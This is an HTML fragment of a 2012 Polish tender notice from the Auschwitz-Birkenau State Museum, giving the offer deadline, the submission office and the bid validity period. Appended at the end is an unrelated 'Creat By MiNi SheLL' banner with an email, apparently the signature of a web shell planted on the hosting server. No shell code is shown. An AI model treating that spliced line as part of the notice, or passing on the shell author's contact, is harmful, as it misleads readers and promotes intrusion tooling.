<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu, ul. Więźniów Oświęcimia 20, 32-603 Oświęcim,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2012 godzina 13:00, miejsce: 3.	Ofertę należy złożyć w siedzibie Zamawiającego tj. w: Oświęcim, ul. Więźniów Oświęcimia 20, budynek administracyjny  o nr inw. A-44, parter, biuro podawcze Muzeum - pokój nr 1.8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com